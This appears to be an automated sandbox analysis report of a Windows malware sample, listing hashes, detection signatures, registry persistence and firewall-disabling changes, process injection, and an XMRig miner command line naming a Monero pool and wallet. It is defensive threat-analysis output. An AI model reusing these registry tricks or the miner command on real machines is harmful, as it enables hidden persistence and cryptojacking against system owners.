Analysis
- max time kernel: 154s
- max time network: 184s
- platform: windows7_x64
- resource: win7-20220414-en
- submitted: 07-07-2022 23:58

Static task: static1
Behavioral task: behavioral1
Sample: 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
Resource: win7-20220414-en
General
- Target: 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
- Size: 2.1MB
- MD5: 65c47159ad930504229825ef323aecf8
- SHA1: 26974a01d0815a6f5cc63b34527a1a6a91ba2705
- SHA256: 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16
- SHA512: d2ccc975b97380f2c3d4fdc0d403f0b150b4e34eedc6b1e3f4d4d1ff773a6bb0d7dcb48cccfd83e8ac06ec2972006da9bc21481cadf02563dcc17cbe89888d77
Malware Config
Signatures

Modifies WinLogon for persistence (2 TTPs, 1 IoC)
Processes:
- msiexec.exe: Set value (str) \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe, C:\\Users\\Admin\\AppData\\Roaming\\e7c7efc\\colorcpl.exe"

Modifies firewall policy service (2 TTPs, 4 IoCs)
Processes:
- explorer.exe: Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile
- explorer.exe: Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0"
- explorer.exe: Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
- explorer.exe: Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"

suricata: ET MALWARE Win32/Neurevt.A/Betabot Check-in 4

XMRig Miner payload (3 IoCs)
Memory regions matching YARA rule xmrig:
- behavioral1/memory/1180-81-0x0000000000400000-0x00000000004DA000-memory.dmp
- behavioral1/memory/1180-86-0x0000000000400000-0x00000000004DA000-memory.dmp
- behavioral1/memory/1180-102-0x0000000000400000-0x00000000004DA000-memory.dmp

Sets file execution options in registry (2 TTPs, 4 IoCs)
Processes:
- 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\gsyocy933ke1m3.exe
- 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\gsyocy933ke1m3.exe\DisableExceptionChainValidation
- explorer.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe
- explorer.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "ltjufqn.exe"

Memory regions matching YARA rule upx:
- behavioral1/memory/1180-75-0x0000000000400000-0x00000000004DA000-memory.dmp
- behavioral1/memory/1180-77-0x0000000000400000-0x00000000004DA000-memory.dmp
- behavioral1/memory/1180-79-0x0000000000400000-0x00000000004DA000-memory.dmp
- behavioral1/memory/1180-81-0x0000000000400000-0x00000000004DA000-memory.dmp
- behavioral1/memory/1180-86-0x0000000000400000-0x00000000004DA000-memory.dmp
- behavioral1/memory/1180-102-0x0000000000400000-0x00000000004DA000-memory.dmp
Checks BIOS information in registry (2 TTPs, 1 IoC)
BIOS information is often read in order to detect sandboxing environments.
Processes:
- explorer.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion

Drops startup file (1 IoC)
Processes:
- 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe: File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\autoit.vbe

Adds Run key to start application (2 TTPs, 8 IoCs)
Processes:
- explorer.exe: Key created \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
- explorer.exe: Set value (str) \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\llass = "C:\\ProgramData\\windervt\\gsyocy933ke1m3.exe"
- explorer.exe: Key created \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- explorer.exe: Set value (str) \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Run\llass = "\"C:\\ProgramData\\windervt\\gsyocy933ke1m3.exe\""
- msiexec.exe: Key created \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- msiexec.exe: Set value (str) \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Run\llass = "\"C:\\ProgramData\\windervt\\gsyocy933ke1m3.exe\""
- 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe: Key created \Registry\User\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Run
- 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe: Set value (str) \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Run\LPwNNTETTJ = "\"C:\\Users\\Admin\\AppData\\Local\\XICFNZ~1\\zcvhost.exe\""

Checks whether UAC is enabled
Processes:
- 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe: Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA

Maps connected drives based on registry (3 TTPs, 2 IoCs)
Disk information is often read in order to detect sandboxing environments.
Processes:
- msiexec.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum
- msiexec.exe: Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0
Suspicious use of NtSetInformationThreadHideFromDebugger (13 IoCs)
Processes:
- PID 1484 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe (1 entry)
- PID 568 explorer.exe (8 entries)
- PID 560 msiexec.exe (4 entries)

Suspicious use of SetThreadContext (1 IoC)
Processes:
- PID 940 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe set thread context of PID 1180 notepad.exe

Checks processor information in registry (2 TTPs, 4 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
- 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe: Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
- 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
- explorer.exe: Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
- explorer.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Enumerates system info in registry (2 TTPs, 2 IoCs)
Processes:
- explorer.exe: Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS
- explorer.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer

Modifies Internet Explorer Protected Mode (1 TTP, 4 IoCs)
Processes:
- explorer.exe: Set value (int) \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3"
- explorer.exe: Set value (int) \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3"
- explorer.exe: Set value (int) \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3"
- explorer.exe: Set value (int) \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3"

Modifies Internet Explorer Protected Mode Banner (1 TTP, 1 IoC)
Processes:
- explorer.exe: Set value (int) \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1"

Modifies Internet Explorer settings
Processes:
- explorer.exe: Key created \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Main
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes:
- PID 940 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe (10 entries)
- PID 560 msiexec.exe (51 entries)
- PID 568 explorer.exe (3 entries)

Suspicious behavior: MapViewOfSection (7 IoCs)
Processes:
- PID 1484 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe (2 entries)
- PID 568 explorer.exe (5 entries)

Suspicious behavior: RenamesItself (1 IoC)
Processes:
- PID 1484 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe

Suspicious use of AdjustPrivilegeToken (31 IoCs)
Processes:
- PID 1180 notepad.exe: Token SeLockMemoryPrivilege (2 entries)
- PID 1484 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe: Tokens SeDebugPrivilege, SeRestorePrivilege, SeBackupPrivilege, SeLoadDriverPrivilege, SeCreatePagefilePrivilege, SeShutdownPrivilege, SeTakeOwnershipPrivilege, SeChangeNotifyPrivilege, SeCreateTokenPrivilege, SeMachineAccountPrivilege, SeSecurityPrivilege, SeAssignPrimaryTokenPrivilege, SeCreateGlobalPrivilege, 33
- PID 1400 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe: Token SeDebugPrivilege
- PID 568 explorer.exe: Tokens SeDebugPrivilege, SeRestorePrivilege, SeBackupPrivilege, SeLoadDriverPrivilege, SeCreatePagefilePrivilege, SeShutdownPrivilege, SeTakeOwnershipPrivilege, SeChangeNotifyPrivilege, SeCreateTokenPrivilege, SeMachineAccountPrivilege, SeSecurityPrivilege, SeAssignPrimaryTokenPrivilege, SeCreateGlobalPrivilege, 33

Suspicious use of SetWindowsHookEx (1 IoC)
Processes:
- PID 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe

Suspicious use of WriteProcessMemory (64 IoCs)
Processes:
- PID 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe wrote to memory of PID 1484 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe (20 entries)
- PID 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe wrote to memory of PID 940 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe (20 entries)
- PID 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe wrote to memory of PID 1400 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe (24 entries)
Processes

- C:\Windows\Explorer.EXE (PID 1280)
  Command line: C:\Windows\Explorer.EXE
  - C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe (PID 1928)
    Command line: "C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
    Signatures: Drops startup file; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
    - C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe (PID 1484)
      Command line: "C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
      Signatures: Sets file execution options in registry; Checks whether UAC is enabled; Suspicious use of NtSetInformationThreadHideFromDebugger; Checks processor information in registry; Suspicious behavior: MapViewOfSection; Suspicious behavior: RenamesItself; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\SysWOW64\explorer.exe (PID 568)
        Command line: C:\Windows\SysWOW64\explorer.exe
        Signatures: Modifies firewall policy service; Sets file execution options in registry; Checks BIOS information in registry; Adds Run key to start application; Suspicious use of NtSetInformationThreadHideFromDebugger; Checks processor information in registry; Enumerates system info in registry; Modifies Internet Explorer Protected Mode; Modifies Internet Explorer Protected Mode Banner; Modifies Internet Explorer settings; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection; Suspicious use of AdjustPrivilegeToken
    - C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe (PID 940)
      Command line: "C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
      Signatures: Adds Run key to start application; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses
      - C:\Windows\notepad.exe (PID 1180)
        Command line: "C:\Windows\notepad.exe" -o pool.monero.hashvault.pro:5555:80 -u 48g2oLrkRG5JtnYA1pUukrYHgsu6aBqGTVxzZx6av6wvhBtgTHrKquWXMY2BJNnxs3aqj3U5RMnoZ6HaZYRMUouU8ke7kC4 -p trainwreck -v 0 -t 2
        Signatures: Suspicious use of AdjustPrivilegeToken
    - C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe (PID 1400)
      Command line: "C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
      Signatures: Suspicious use of AdjustPrivilegeToken
      - C:\Windows\SysWOW64\msiexec.exe (PID 560)
        Command line: C:\Windows\SysWOW64\msiexec.exe
        Signatures: Modifies WinLogon for persistence; Adds Run key to start application; Maps connected drives based on registry; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious behavior: EnumeratesProcesses
- C:\Windows\system32\Dwm.exe (PID 1248)
  Command line: "C:\Windows\system32\Dwm.exe"
- C:\Windows\system32\DllHost.exe (PID 1556)
  Command line: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}